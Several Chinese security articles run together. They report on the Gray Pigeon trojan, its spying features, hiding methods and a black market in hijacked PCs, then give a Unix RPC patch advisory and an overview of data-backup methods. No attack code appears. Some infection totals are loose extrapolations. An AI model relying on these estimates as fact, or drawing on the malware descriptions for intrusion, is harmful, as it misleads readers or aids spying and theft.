　　从2004年至2005年，中国互联网化进程飞速发展，大量的商业动作实现了互联网化，电子商务成为普通网民进行消费的选择之一，网络游戏在中国大地全面开花。在这样的年代下，计算机病毒也逐步转向了以经济利益为中心的方向发展。大量通过IM（即时通讯软件）传播的木马/黑客/病毒，它们不择手段的从用户系统中盗取网银帐号、网游帐号及密码。这些病毒给中国互联网提出了新的考验--用户的网络虚拟资产正在受到威胁。

　　也就在2004和2005这两年之间，灰鸽子逐步进入了成熟的状态，由于源码的释放，大量变种在互联网中衍生。2004年灰鸽子总共发现了1000多变种，而在2005年，这个数字迅速上升到了3000多。“灰鸽子”最大的危害在于潜伏在用户系统中，由于其使用的“反弹端口”原理，一些在局域网（企业网）中的用户也受到了“灰鸽子”的侵害，使得受害用户数大大提高，2004年的感染统计表现为103483人，而到2005年数字攀升到890321人。“灰鸽子”本身所具备的键盘记录、屏幕捕捉、文件上传下载和运行、摄像头控制等功能，将使用户没任何隐私可言，更可怕的是服务端高度隐藏自己，是受害者无从得知感染此病毒。



灰鸽子增长迅速

　　2005年，金山毒霸针对病毒泛滥，特别是像“灰鸽子”这样一类恶性木马，采取了严打的措施，提高病毒库升级周期，加强应急处理流程，而在技术上积极研究对策，最大限度的减少“灰鸽子”给用户带来的危害。

　　全民黑客时代（2006年-2007年）

　　2006年，电脑病毒呈爆炸式增长，金山毒霸共截获新增病毒样本总计240156种，其中木马病毒新增数占总病毒新增数的73％，高达175313种；随着计算机技术的普及，由于制作工具的泛滥，病毒变种增多病毒的制作也逐渐呈现商业化的运作。某些制作者小组甚至可以根据使用者的要求为其提供针对特定目标的专门版本。病毒程序的模块化使得病毒制作的门槛降低，很多具备一定计算机知识的用户可以根据自己的需要对其自行组合。因此2006年病毒的变种迅速增加，以典型的“灰鸽子”木马为例，高峰时期几乎每天增加10余个不同变种，迄今为止共出现了6万余种变种，并连续三年荣登国内10大病毒排行榜。而且这类木马往往通过自我升级功能频繁的进行更新以对抗反病毒软件。

　　2007年2月23日，灰鸽子2007 beta2版本发布。该版本的隐形性更强，可以任意插入常见的程序，比如QQ，下载工具等等，程序性能也得到提升，可以同时监视多个目标主机，并对远程监视的计算机进行如下操作：编辑注册表；上传下载文件；查看系统信息、进程、服务；查看操作窗口、记录键盘、修改共享、开启代理服务器、命令行操作、监视远程屏幕、操控远程语音视频设备、关闭、重启机器等。而由于灰鸽子采取了直接进程注入方式，利用HOOK API的方式实现病毒文件及病毒进程的隐藏，所有盗取用户信息的操作，远程计算机的操作人员可能毫不知情。

　　发展到今天，灰鸽子已经不仅仅是一个病毒如此简单，其背后已经形成了一条黑色的产业链条，任何一个网络菜鸟都可以通过购买灰鸽子病毒、拜灰鸽子高手为师而成为黑客，可以说，灰鸽子病毒演变到今天，已经催生了全民黑客时代的到来。

　　普通网民很难了解到在他们的生活之外竟然有一个如此完整的制造、贩卖病毒的“生态圈”。浏览各大网络论坛，购买、出售灰鸽子木马的人比比皆是，而购买灰鸽子教程、批量出售被灰鸽子控制的“肉鸡”、企图利用灰鸽子进行不法勾当的人更是数不胜数。尤其是伴随着灰鸽子2007的推出，这种不正之风正在互联网迅速蔓延，灰鸽子的猖獗已经到了不得不管的地步！

　　金山作为国内最著名的网络信息安全厂商，动用了大量的人力物力，将全面围剿以“灰鸽子”为首的恶性木马病毒。从技术角度，我们推出了具有全球领先的数据流杀毒技术的的灰鸽子专杀工具，任何人均可登陆金山毒霸官网免费下载使用；已经购买了金山毒霸2007的正版用户，升级到最新版本，也能全面查杀灰鸽子。金山毒霸并将时刻监控其发展动态。同时我们也呼吁国家相关部门能够关注此事，关注灰鸽子这种网络制作、贩卖病毒的违法行为。我们相信邪不压正，我们会用一流的反病毒技术为广大网民创造一片安宁的天空！

金山总裁雷军：灰鸽子危害超出熊猫烧香10倍

金山总裁雷军表示，“灰鸽子已不再是一个单纯的病毒，其背后是一条制造病毒、贩卖病毒、病毒培训为一体的黑色产业链，从某种意义上讲，灰鸽子的危害超出熊猫烧香10倍！”

　　与熊猫烧香的“张扬”不同，灰鸽子更象一个隐形的“贼”，潜伏在用户“家”中，监视用户的一举一动，甚至用户与MSN、QQ好友聊天的每一句话都难逃“贼”眼。如果说熊猫烧香的危害还停留在对电脑自身的破坏，而灰鸽子已经发展到对“人”的控制，而被控者的人却毫不知情。

　　据金山毒霸全球反病毒监测中心数据显示，仅2007年2月，中国约有258235台计算机感染灰鸽子，而同期国内感染病毒的计算机总共才2065873台，也就是说中国每10台感染病毒的计算机中，就有超过一台感染了灰鸽子。

　　据悉，灰鸽子本身并不具备传播性，那么灰鸽子大面积感染的背后到底存在着什么不可告人的秘密呢？

　　据金山反病毒专家介绍，灰鸽子的背后已经形成了一个制造、贩卖、销售病毒的“传销”帝国，而处于这条产业链条最底层的被称为“肉鸡”，一些人利用灰鸽子大量“发展”肉鸡，并通过贩卖肉鸡获取丰厚的经济利益。

　　按一个普通的灰鸽子操控者一个月抓10万台“肉鸡”计算，一个月就能轻松赚取至少1万元，而这还不包括窃取“肉鸡”电脑上的QQ号、游戏帐号、游戏币、银行帐号等进行交易所获得的收入。正是由于灰鸽子背后巨大的经济诱惑，无数人投身其中，乐此不疲地制造、传播灰鸽子。

　　据统计，从百度上搜索的讨论灰鸽子的论坛有数十个之多。其中灰鸽子工作室每天的浏览量大概在12000人；凤凰灰鸽子论坛目前共有会员33802个，其中最高有1124人同时在线；灰鸽子社区目前共有会员523人；这还没算上其他许多大众社区网站以及对此跃跃欲试的游客或好奇者。

　　灰鸽子的黑色产业链条正在逐步形成，网络公开叫卖的行为已经严重违反了国家法律，如果任其发展下去后果不堪设想。

　　有法律专家指出，中国的互联网立法比国外相对落后。《计算机信息网络国际联网安全保护管理办法》中规定制造和传播病毒是违法的，但是对于木马、黑客程序、“流氓软件”等并没有清晰的界定。这也是灰鸽子制造者敢于利用网络公开叫卖的根本原因。

　　雷军表示，如果一个正常的软件，一旦被反病毒产品判定为病毒，其开发者会第一时间要求反病毒公司修正其错误。而灰鸽子的作者从来没有，并不断推陈出新，同全球反病毒产品持续对抗达5年之久，丝毫没有放弃的迹象，这极其不寻常。金山作为国内最著名的网络信息安全厂商，动用了大量的人力物力，将全面围剿以“灰鸽子”为首的恶性木马病毒。金山并将时刻监控其发展动态。

灰鸽子引发全民黑客时代　安全威胁就在身边

性爱照片遭偷拍 盗窃犯竟是一只“鸽子”

　　2007年春节，当人们欢天喜地喜迎中华民族的传统佳节时，张小姐却将自己紧锁于房中，心中充满了恐惧。

　　就在不久前，她收到了一封匿名邮件“你和你老公的亲密照片已经全部在我手中，你的样子好诱人啊，不知道传到网上会怎么样呢？”

　　当张小姐手忙脚乱打开邮件附件中的照片，一下子就彻底崩溃了，里面确实是她本人的照片。最令张小组想不通的是，还有她和老公床地之欢的一些照片，自己根本就没有拍，对方是怎么拍到的呢，难道家中电脑摄像头被人无端开启了？

　　焦虑？恐惧？摧残？愤怒？然而，再多的词汇也不能表达不了张小姐的心情……

　　经常上网的朋友常常会看类似裸照失窃、性爱照片遭偷拍的报道，无疑都给受害人造成了金钱、特别是精神和心理上的伤害。

　　让人百思不得其解的是，受害人与不法之徒往往是远隔千里，不法之徒是根本没有可能接触自己的电脑的，那么他们是如何从自己的电脑中将裸照窃走的呢？

　　金山毒霸反病毒工程师李铁军在接受记者采访时指出，以上性爱照片遭偷拍的事件，极有可能是黑客利用灰鸽子病毒所为。自2001年灰鸽子出现以来，金山公司就把该病毒定为重点查杀对象。

　　或许用户不禁会问，电脑病毒不是损坏文件、破坏系统、弄瘫机器的吗？怎么还能盗窃、偷拍呢？

　　此“鸽”非彼“鸽”，破坏、偷窃无所不用其极

　　几乎所有人都知道熊猫烧香，就是因为这个病毒有个明显的图标。而灰鸽子木马病毒入侵系统后，只有非常有经验的电脑用户才可能发现异常，普通用户根本毫不知情，就好比有个会隐形术的贼在你家中长驻。

　　根据李铁军的介绍，“灰鸽子”(Hack.Huigezi)是一款集多种控制方法于一体的木马病毒，一旦用户电脑不幸感染了灰鸽子病毒，黑客或不法份子便可以通过控制程序随时阅读、复制、删除我们的文件，甚至是开关机、格式化磁盘等操作，可以说我们的一举一动都在黑客或不法用户的监控之下，要窃取我们的帐号、密码、照片、重要文件简直是轻而易举。

　　更甚的是，他们还可以连续捕获远程电脑屏幕，还能监控被控电脑上的摄像头，自动开机（不开显示器）并利用摄像头进行录像。这也是张小姐床第之娱被人偷拍的真正原因。

　　“灰鸽子”变种数量突破六万，高峰时每天变种达10多个

　　据金山《中国互联网2006年度信息安全报告》数据显示，截至2006年底，“灰鸽子”木马已经出现了6万多个变种，高峰时每天都要处理10多个灰鸽子的变种。仅2004年，感染“灰鸽子”木马的电脑高达103483台，而到2005年数字攀升到890321台。

　　“灰鸽子”本身所具备的键盘记录、屏幕捕捉、文件上传下载和运行、摄像头控制等功能，将使用户没任何隐私可言。更可怕的是，灰鸽子会在用户电脑上高度隐藏自己，使用户无从得知已经感染了此病毒。

　　春节期间超过25万台电脑成为灰鸽子的“肉鸡”

　　不幸被黑客或非法分子种上“灰鸽子”木马的计算机便成了所谓的“肉鸡”。黑客或非法分子可以从“肉鸡”上轻松盗取QQ号码、游戏帐号、银行帐号以及隐私资料等重要信息。

　　据金山毒霸全球反病毒监测中心数据，仅2007年2月一个月时间，中国共有2065873台电脑感染了计算机病毒，而这其中，被注入灰鸽子木马病毒的就占到258235台。也就是说中国每10台感染病毒的计算机中，就有超过一台电脑感染的是灰鸽子。

　　成为“肉鸡”后，用户在电脑上的每一个击键动作都被黑客或非法分子记录，游戏帐号、QQ密码、银行帐号等都将成为黑客或非法分子的囊中之物。

　　灰鸽子抓“肉鸡”的教程随处可见，1.37亿网民时刻面临威胁

　　用Google检索“灰鸽子病毒”，检索到约 268，000 项结果；用Baidu检索“灰鸽子病毒”，找到相关网页约548，000篇，其中关于如何用灰鸽子抓肉鸡的教程随处可见。并且叫卖灰鸽子教程的人宣称“包教包会”。

　　在它们的帮助下，没有任何基础的人都可以从中国13700万这一庞大的网络用户群中，轻松捕获那些疏于防范的用户，并将其变为自己的“肉鸡”。如果你恰好是疏于防范中的一员，很有可能你成为“肉鸡”很久了。

　　形势正将变得越来越严峻。随着“灰鸽子门徒”群体增加，我们身边越来越多的人正在悄悄的变成他们的“肉鸡”。

　　“肉鸡”被公开叫卖

　　打开百度“灰鸽子贴吧”，让人触目惊心。一台台中毒的电脑被称为“肉鸡”在网上公开叫卖，内陆“鸡”1毛到4毛每台，辽宁“鸡”5毛到8毛每台，广东肉鸡1块一台，港台“鸡”3块，外国“肉鸡”5块……，此类信息在百度“灰鸽子贴吧”比比皆是。

　　在一些交易站点，“肉鸡”的卖主们俨然是一副“诚信经营”的模样，采用诚信打分制，让买主给他们打分。他们通过交易网站、网络支付等正当的交易手段销售从“肉鸡”上盗窃来的QQ号码、QQ币、游戏币、名人隐私资料、私人照片、私人视频等，买家和卖家的交易就这样在网上如火如荼的进行。

　　除了倒卖“肉鸡”、销售盗窃赃物外，黑客们还操纵“肉鸡”，让“肉鸡”成为他们谋利的工具。

　　网络安全形式严峻，法律缺失成治理难题

　　随着网络越来越向真实社会靠近，流窜在互联网里的黑客或不法分子们的攻击行为也更有组织性，攻击目标已经从单纯的追求“荣耀感”向获取多方面实际利益的方向转移。利用“灰鸽子”偷拍她人“裸照”勒索钱财就是其中的一个例证。

　　但目前中国的互联网环境还不十分成熟，黑客或不法分子出于各种目的利用黑客木马工具进行网络攻击和远程控制比较普遍。

　　有法律专家指出，中国的互联网立法比国外要落后许多。《计算机信息网络国际联网安全保护管理办法》中规定制造和传播病毒是违法的，但是对于木马、黑客程序、“流氓软件”等并没有清晰的界定。这也是黑客们在网上公开叫卖“肉鸡”而无人问津的一个重要原因。

　　“盗窃网络无形财产犯罪频繁发生、难以控制的原因除了这类犯罪具有隐蔽性特征之外，更重要的是法律缺失。”两会代表刘来平的心声也正是我们广大网民正在期盼的，打击网络电脑犯罪，单靠电脑用户自身和反病毒厂商的力量还远远不够。

这是一个隐藏在超过20000000（两千万）台接通网络的计算机中的木马，每一台中了此木马的电脑就是控制者手里的“肉鸡”，成为刀俎下的鱼肉。这些“肉鸡”在控制者手中就像大白菜一样被卖来卖去，低至1分一只，高达5块一只。这个木马形成了一个庞大的帝国，这个帝国里面有着严格的等级，有着完备的商品流通体制，有着骇人听闻的偷窥、盗窃、欺骗和敲诈，还有着年收入数千万甚至数亿元的“病毒富翁”……（文中人物名除标示有单位名称外其他均为化名）

　　“肉鸡”是一个美好的名字，总是让人情不自禁的想到一顿香喷喷的饭菜。然而打开百度“灰鸽子”贴吧，触目惊心。一台台中毒的电脑被称为“肉鸡”在网上公开叫卖，内陆“鸡”1毛到4毛每台，辽宁“鸡”5毛到8毛每台，广东肉鸡1块一台，港台“鸡”3块，外国“肉鸡”5块……

　　从“肉鸡”上盗取的QQ号码、游戏币、游戏帐号、隐私资料等将会被通过一些手段在互联网上肆意交易。一些人成为了富豪，更多的人则成了受害者。

　　李明就是在三年前一次偶然的聊天后变成了一个“肉鸡”贩子，也从一个受害者变成了一个害人者。

　　“肉鸡”汹涌的产业链

　　“在别人电脑上种上‘灰鸽子’木马，对方电脑就会成为你的‘肉鸡’，任你宰割。”李明介绍说。

　　“在圈内，用灰鸽子木马去控制别人机器的人被称为客户端，而被控制的‘肉鸡’则被称为服务端。客户端可以在服务端的上做任何事情，以至于‘战场’清理完毕，服务端也不能发现任何蛛丝马迹。”李明解释到。

　　李明就是在朋友的介绍下开始使用“灰鸽子”的。开始时他兼职抓“肉鸡”，一天抓100只“鸡”左右，每天能有百八十块钱的收入。当他抓“鸡”的数量与日俱增、技术也越来越娴熟时，他干脆辞掉了公职。他还买下一些客户端不打算再玩了而低价出售的“肉鸡”，然后倒手卖出去赚个差价。“这样的收入比我以前的工作赚的多很多。”


图1：灰鸽子木马黑色产业链（点击查看大图）

　　圈内公开的行价是内陆“鸡”1毛到4毛每台，辽宁“鸡”5毛到8毛每台，广东“肉鸡”1块一台，港台“鸡”3块，外国“鸡”5块……

　　因为辽宁、广东“肉鸡”玩游戏的多，买来后能窃取更多游戏币，“肉鸡”的利用价值更高，所以价钱更贵一些。

　　有互联网分析人士指出港台和国外“鸡”之所以高价，是为了盗取魔兽等一些流行游戏国外服务器的帐号。魔兽金币在国外服务器的价格是国内的两倍。

　　经过一年的摸索，李明已经被“晚辈”称为老师了，他在倒卖“肉鸡”的同时开始带徒弟。对“菜鸟”级的徒弟手把手的教他怎么装软件、怎么种木马、怎么样让木马通过杀毒软件免杀、怎么抓“肉鸡”、怎么玩“肉鸡”。

　　这种手把手的培训，学费一般为200元。如果“徒弟”求“师”心切，也肯开出300甚至更高的价格。那些具有基础电脑知识的人开始在网站上寻找各种文字的或者视频的教程，这种教程也在论坛上随处可见。这些所谓的“抓鸡教程”的市场需求也非常广大。而这些“徒弟”也非常容易捞回成本：抓“肉鸡”出售或转让，盗“肉鸡”的游戏帐号、QQ号等转手出售，控制“肉鸡”点击广告点击网站，甚至偷拍点“肉鸡”主人的裸照敲诈几万等各种手段无所不用其极。

　　“人的心理的阴暗面一旦被激发，就很难控制。”李明说。

　　李磊是李明的一个“鸽友”，他倒卖“肉鸡”，一个月抓10万台“肉鸡”就能轻轻松松赚到至少1万块钱。而且这还不包括窃取“肉鸡”电脑上的QQ号、游戏帐号、游戏币、银行帐号等进行交易所获得的收入。同时他每个月还能带数十个徒弟。虽然月入几万，但是觉得需要玩一些更刺激的。李磊开始盗取“肉鸡”的QQ号码、游戏币、游戏帐号，然后通过一些网络交易手段将这些“赃物”交易出去。再到后来他开始窃取“肉鸡”电脑上的一些隐私的资料、图片、视频等，然后把它们公开，并以此为乐。

　　在一些电子商务交易站点，“肉鸡”的卖主们俨然是一副“诚信经营”的模样，采用诚信打分制，让买主给他们打分。他们通过交易网站、网络支付等正当的交易手段销售从“肉鸡”上盗窃来的QQ号码、QQ币、游戏币、名人隐私资料、私人照片、私人视频等，买家和卖家的交易就这样在网上如火如荼的进行。李磊在“运气好”的时候，一晚上能盗取1000个QQ号码，一个卖10块，就能卖1万块。

　　除了倒卖“肉鸡”、销售盗窃赃物外，他们还操纵“肉鸡”，让“肉鸡”成为他们谋利的工具。在某个QQ群里，一群操控者正在讨论如何更好的通过操控“肉鸡”点击国外的某些点击付费的网站，通过点击欺诈来获得更多的收入。按照行价点击一次就能给“肉鸡”控制者带来0.3美金的收入。

　　同时“灰鸽子”制作者及转卖者要控制下线也非常容易。对软件稍作修改留个后门，让这些控制“肉鸡”的机器再变成半个“肉鸡”，然后再吃他们从“肉鸡”那带来的好处。这在行业里叫做“黑吃黑”。

　　这种暴利刺激着更多的人加入进来。

　　据统计，从百度上搜索的讨论灰鸽子的论坛有数十个之多。其中灰鸽子工作室每天的浏览量大概在12000人；凤凰灰鸽子论坛目前共有会员33802个，其中最高有1124人同时在线；灰鸽子社区目前共有会员523人；这还不算上其他许多大众社区网站以及对此跃跃欲试的游客或好奇者。

　　一个庞大的“灰鸽子”帝国日渐形成。

　　年入数千万的“木马”富豪

　　在这个庞大的帝国里，一切想成为控制者的人都得像李明一样花100元从“灰鸽子”工作室的网站上购买灰鸽子控制端软件，然后每年付给该网站100元的管理费用（这个标准时有变化）。

　　在Alexa3月12日排名中，灰鸽子工作室全球排名是351998位，中国排名30561位。并且网站还吸引了来自香港、澳大利亚和新西兰的网民。网站在这几个国家的排名也都非常靠前，在香港的排名是142816位，在澳大利亚162416位。足可见如此之多的人对网络偷窥、盗窃、跟踪、不正当交易的兴趣。

　　笔者算了一笔帐，2006年全年灰鸽子工作室峰值独立访问的IP就是1.7万/天，峰谷是0.6万/天，平均峰值为1.2万。按照互联网的一般规律，5％的访问者会下载购买，那么一天就有600人下载购买。则它的收入一天就是6万，那么该工作室一年的收入就是2190万，而且它不用缴税。Alexa的统计显示，2005年灰鸽子工作室网站IP访问的均值要比1.2万高得多，也就是说2005年在灰鸽子工作室的收入远不止2190万。

　　据一位从2003年初就开始卖二手“灰鸽子”的人士向笔者透露，灰鸽子工作室网站一年的收入远远不止这些。该人士指出，“灰鸽子”工作室开发的这个程序有多个流通渠道流通出去，这些渠道可能卖的有破解版（即盗版），但也在帮助它销售。另外它可能有线下销售模式。此外，它还可以代理制作销售其他木马或病毒。另外有使用者在网站上发帖举报灰鸽子制作者在一些销售出去的软件上留有后门，以用来控制“控制者”，和他们分享“肉鸡”带来的收益。“它一年的收入估计不下1亿”，该人士表示。

　　网站上的资料显示，该网站只有两个成员，客服都用QQ取代，客服电话在偏僻的安徽某县，另聘请有一个法律顾问。因此人力及办公等成本极为低廉，几乎为0。

　　一年至少1亿？笔者觉得太不可思议了，简直无法想象卖木马能卖这么多钱。一位在中关村某IT公司混迹多年的人士这样对笔者说“别小看这些人，他们好多人的资产比一些中小规模的公司的资产都要大得多。前一阵媒体报道热烈的“熊猫烧香”病毒的主角李俊，一个月至少获利15万。这些人赚足了钱之后，就开始漂白自己，摇身一变成为富有正义感的企业家。”

　　真假“木马”凸显法律监管的漏洞

　　这个受害者集体声讨的木马，在其官方网站--灰鸽子工作室上的名字叫做“远程管理软件”。麦卡菲、金山毒霸、卡巴斯基、瑞星等几乎所有的信息安全厂商都将这个叫做“灰鸽子”的软件作为木马来查杀，然而它一直辩称自己是“远程管理软件”。

　　“哪个网管会用这种工具管理网内电脑？除非他是窥私癖，或者有其他特殊目的。”一位网管这么说。他管理着整个公司上百台电脑。

　　在“灰鸽子”的功能介绍中，制作者将其定义为“远程管理软件”。然而它可以在“被管理者”一无所知的情况下，在被“管理”的计算机上做任何事情：它可以模仿Windows资源管理器，可以对文件进行复制、粘贴、删除、重命名、远程运行等，可以上传下载文件(夹)，断点续传，文件数据加密传输；查看远程系统信息、剪切板查看、进程管理、窗口管理、服务管理、共享管理、代理服务、MS-Dos模拟、插件管理；实施远程控制命令；捕获屏幕，并能把本地鼠标键盘的动作传送到远程实施控制；它可以查看远程摄像头，还有语音聊天功能；它还可以对自动上线的“肉鸡”实施关机、重启、打开网页等一切命令；以及其他一切的控制、修改、偷窥、盗窃、敲诈等功能。



图2：灰鸽子界面

　　金山毒霸的工程师李铁军直言不讳的说“灰鸽子就是一个木马，带有再明显不过的木马特征。我们就是要查杀它，而且我们现在的专杀可以查杀它的任何变种。”就在李铁军和他的同事在准备推出灰鸽子专杀工具之际，一位自称是灰鸽子客服的人员打来电话，称希望“慎重考虑”。

　　“它如果没有这么大财力是不敢做出这种有威胁意味的举动的，至少说明灰鸽子工作室每年获得的收益至少是数千万元级别的。”李铁军称。

　　这样一个具有再明显不过的病毒特征的“灰鸽子”，其制作者和得益者都将它称之为“远程管理软件。”其制作者这样说“我只是私自造了一把枪，他们买去杀人还是自卫与我无关。”然而更多的是无数受害者的声讨。李明坦白的说“我们这些得益者们并不是在自卫，我们一开始就是用它来杀人。”

　　更为可笑的是在灰鸽子工作室网站的二级网页上竟然将“计算机信息网络国际联网安全保护管理办法”条条罗列出来。在其首页上也标注了其聘请的法律顾问。

　　有法律专家指出，中国的互联网立法比国外要落后许多。《计算机信息网络国际联网安全保护管理办法》中规定制造和传播病毒是违法的，但是对于木马、黑客程序、“流氓软件”等并没有清晰的界定。这就导致了2006年出现的“流氓软件”的艰难诉讼。也导致了诸如“灰鸽子”这样的木马制造者能钻法律的空子，并且在网上肆意敛财。

　　在灰鸽子工作室的网站上只有正规的线上支付渠道、联络QQ号码和无人接听的远在安徽某县的电话。这就是许多病毒、木马、黑客程序制作者一贯采用的方式：即便出了事，想立刻找到他们也并不是一件容易的事情。

　　“尽管法律监管存在漏洞，但是‘出来混迟早是要还的’”。李明说。今年年初，李明退出江湖，有了一笔积蓄的他开始着手洗白自己，然而，洗白并不能洗去受害者所受的伤害。

　　安全形势堪忧

　　由CNNIC发布的《2006年中国互联网络发展状况统计报告》显示至2006年年底我国可上网计算机总数为5940万台。网民对网络安全感的认同率仅有28.8％，其余的71.2％的网民都对网络的安全深感担忧。有45.4％的网民非常担忧木马的入侵。

　　根据Alexa统计显示，2006年平均每天有600人购买下载“灰鸽子”控制端木马软件。按照互联网的一般规律，正版和盗版的比例为1：9，那么每天就有6000人下载和使用正版或者盗版的“灰鸽子”控制端软件。这样计算下来，一年有2190000人使用过“灰鸽子”控制端软件。按照一人至少控制过10台“肉鸡”计算，2006年，我国至少有21900000台计算机曾至少一次变成“灰鸽子”控制者的“肉鸡”。这个绝对值非常的惊人。

　　一位不愿透露姓名的“灰鸽子”控制者说“这个数目是非常庞大的。被我控制过的‘肉鸡’前后就超过40000台左右。5940万台可上网电脑中有近40％的联网电脑都至少被”灰鸽子“的控制者控制过一次。如果这些互联网用户知道自己的计算机在被”灰鸽子“木马监视着一举一动，那将会是非常恐怖的，甚至会引起恐慌。”

　　有分析人士指出，如果“灰鸽子”控制端用户数量按照目前的速度增长，那么到2007年底，我国将至少有一半可上网电脑将至少一次变成“肉鸡”。

　　如此庞大的群体的隐私该如何保护，被侵犯的隐私权以及被盗取的虚拟财产甚至真实财产又该如何保护？这不仅仅是法律的问题，更是一个巨大的社会问题。

　　就在此文写就之际，一位心理学家这样分析：对于自制力比较差的群体，或者具有反社会心理倾向的群体，现实中没有表露的人性的阴暗面会在网络上加倍的呈现。加上利益的驱使，引诱更多的人进入其中。灰鸽子不仅仅是一个后门木马，更像是一个邪教，在怂恿那些跃跃欲试的人们到网络上去偷窥、盗窃、破坏、敲诈……

　　李明的洗白并不能洗去他心里的伤痛。三年前他在北京中关村一个电脑卖场做销售工作。在一次聊天中，QQ上一个未曾谋面但是聊得很投机的网友给他发来了一个文件。文件的内容让他大吃一惊：文件里面有李明的过往聊天记录、存在电脑上的照片、公司的文件，还有QQ视频抓拍的图像和短片……他陷入了极度恐慌中，继而是好奇，再后来他就变成了彻底的害人者。

　　“我洗白了自己，但是洗不去心里的阴影”。李明这样说。

　　一个多年的IT从业者这样评说这群人“他们活在一个看不见的阴暗世界中。”

关于国内 Unix 主机常见安全漏洞描述

关于国内 Unix 主机常见安全漏洞描述
作者：lvvl　来源：赛迪网安全社区　
影响：

入侵者可以藉此漏洞修改网页、获得该主机管理权。

事件描述：

在遭受攻击的 UNIX 系统上，入侵者常利用下列

　　rpc.ttdbserver
　　rpc.cmsd
　　rpc.statd/automountd
　　sadmind

程序的 Buffer Overflow 漏洞自远程入侵主机。

解决方法：

1.将不必要的 RPC service 自 /etc/inetd.conf 中移除，移除方法为

(1)编辑 /etc/inetd.conf，将不必要的 service 前面加上 "#" 或直接删除后存盘；

(2)kill -HUP inetd.pid。

2.安装修补程序 (patch)

(1)rpc.statd 及 automountd

Solaris：请依照您的版本安装下列修补程序

rpc.statd:

OS Version Patch ID
__________ _________

SunOS 5.6 106592-02
SunOS 5.6_x86 106593-02
SunOS 5.5.1 104166-04
SunOS 5.5.1_x86 104167-04
SunOS 5.5 103468-04
SunOS 5.5_x86 103469-05
SunOS 5.4 102769-07
SunOS 5.4_x86 102770-07
SunOS 5.3 102932-05

automountd:

OS Version Patch ID
__________ _________
SunOS 5.5.1 104654-05
SunOS 5.5.1_x86 104655-05
SunOS 5.5 103187-43
SunOS 5.5_x86 103188-43
SunOS 5.4 101945-61
SunOS 5.4_x86 101946-54
SunOS 5.3 101318-92

档案可至下列 URL 下载：

　　ftp://sunsolve.sun.com/pub/patches

RedHat：

请参考下列 URL：

　　http://www.redhat.com/support/errata/RHSA-2000-043-03.HTML

Debian：

请参考下列 URL：

　　http://www.debian.org/security/2000/20000719a

(2)rpc.cmsd

Solaris：

请依照您的版本安装下列修补程序

OpenWindows：

SunOS version Patch ID
_____________ _________
SunOS 5.5.1 104976-04
SunOS 5.5.1_x86 105124-03
SunOS 5.5 103251-09
SunOS 5.5_x86 103273-07
SunOS 5.3 101513-14
SunOS 4.1.4 100523-25
SunOS 4.1.3_U1 100523-25

　　CDE:

CDE version Patch ID
___________ ________
1.3 107022-03
1.3_x86 107023-03
1.2 105566-07
1.2_x86 105567-08

档案可至下列 URL 下载：

ftp://sunsolve.sun.com/pub/patches

(3)rpc.ttdbserverd

Solaris：

请依照您的版本安装下列修补程序

SunOS version Patch ID
_____________ _________

5.7 107893-04
5.7_x86 107894-04
5.6 105802-11
5.6_x86 105803-13
5.5.1 104489-10
5.5.1_x86 105496-08
5.5 104428-08
5.5_x86 105495-06
5.4 102734-05

档案可至下列 URL 下载：

ftp://sunsolve.sun.com/pub/patches

(4)sadmind

Solaris：

请依照您的版本安装下列修补程序

OS Version Patch ID
__________ _________
SunOS 5.7 108662-01
SunOS 5.7_x86 108663-01
SunOS 5.6 108660-01
SunOS 5.6_x86 108661-01
SunOS 5.5.1 108658-01
SunOS 5.5.1_x86 108659-01



在遭遇破坏前对企业数据进行安全防护

作者：塞北|谷子熟了吗　来源：赛迪网安全社区

随着存储产品在市场中的升温，后端存储系统逐渐成为企业业务系统的核心和关键。不可避免，企业更加关注数据安全方面的工作。一般而言，我们有四种方式可以解决存储过程中的数据安全问题，异地备份可以避免发生自然灾害时的数据损失；采用RAID(独立磁盘冗余阵列)可以减少磁盘部件的损坏；采用镜像技术可以减少存储设备损坏；快照可以迅速恢复遭破坏的数据，减少宕机损失。这些技术是数据安全的保障，而保护数据则是存储的首要需求之一。

异地备份

异地备份是保护数据的最安全的方式，无论发生什么情况，那怕是火灾、地震，当其他保护数据的手段都不起作用时，异地容灾的优势就体现出来了，但是困扰异地容灾的问题在于速度和成本，这要求拥有足够带宽的网络连接和优秀的数据复制管理软件。一般主要从三方面实现异地备份，一是基于磁盘阵列，通过软件的复制模块，实现磁盘阵列之间的数据复制，这种方式适用于在复制的两端具有相同的磁盘阵列。二是基于主机方式，这种方式与磁盘阵列无关。三是基于存储管理平台，它与主机和磁盘阵列均无关。

RAID

RAID系统使用许多小容量磁盘驱动器来存储大量数据，并且使可靠性和冗余度得到增强。对计算机来说，这样一种阵列就如同由多个磁盘驱动器构成的一个逻辑单元。所有的RAID系统共同的特点是“热交换”能力：用户可以取出一个存在缺陷的驱动器，并插入一个新的予以更换。对大多数类型的RAID来说，不必中断服务器或系统，就可以自动重建某个出现故障的磁盘上的数据。

镜像

如果故障发生在异地分公司，可以使用镜像技术，进行不同卷的镜像或异地卷的远程镜像，或采用双机容错技术自动接管单点故障机，保证无单点故障和本地设备遇到不可恢复的硬件毁坏时，仍可以启动异地与此相同环境和内容的镜像设备，以保证服务不间断。当然，这样做必然会提升对设备的投资力度。

快照

在数据保护技术中，快照技术(snapshot)是极为基础和热门的技术之一，应用在很多存储过程中，比如数据复制和备份都在使用这种技术。IBM 的FlashCopy、IBM NAS的PSM软件以及VERITAS的FlashSnap软件都是快照技术的代表。

存储系统型远程容灾：成本昂贵

存储系统型远程容灾，顾名思义是基于存储系统(光纤磁盘阵列、NAS)的模式。通过存储系统内建的固件(firmware)或操作系统，通过IP网络或DWDM、光纤通道等传输介面连结，将数据以同步或异步的方式复制到远端。知名的存储系统型远程容灾方案有SRDF、TrueCopy、PPRC等。

与主机型远程容灾相比，存储系统型远程容灾的优点就是将数据与运行分开，对主机系统的运行资源影响比较小。另外，由于运行机制大多是利用镜像(mirror)来复制数据，并借助高速缓冲存储器加速I/O存取，两端的数据差异时间点比较小，加上存储系统本身具备一定的容错能力，具有一定的运行性能和可靠性。

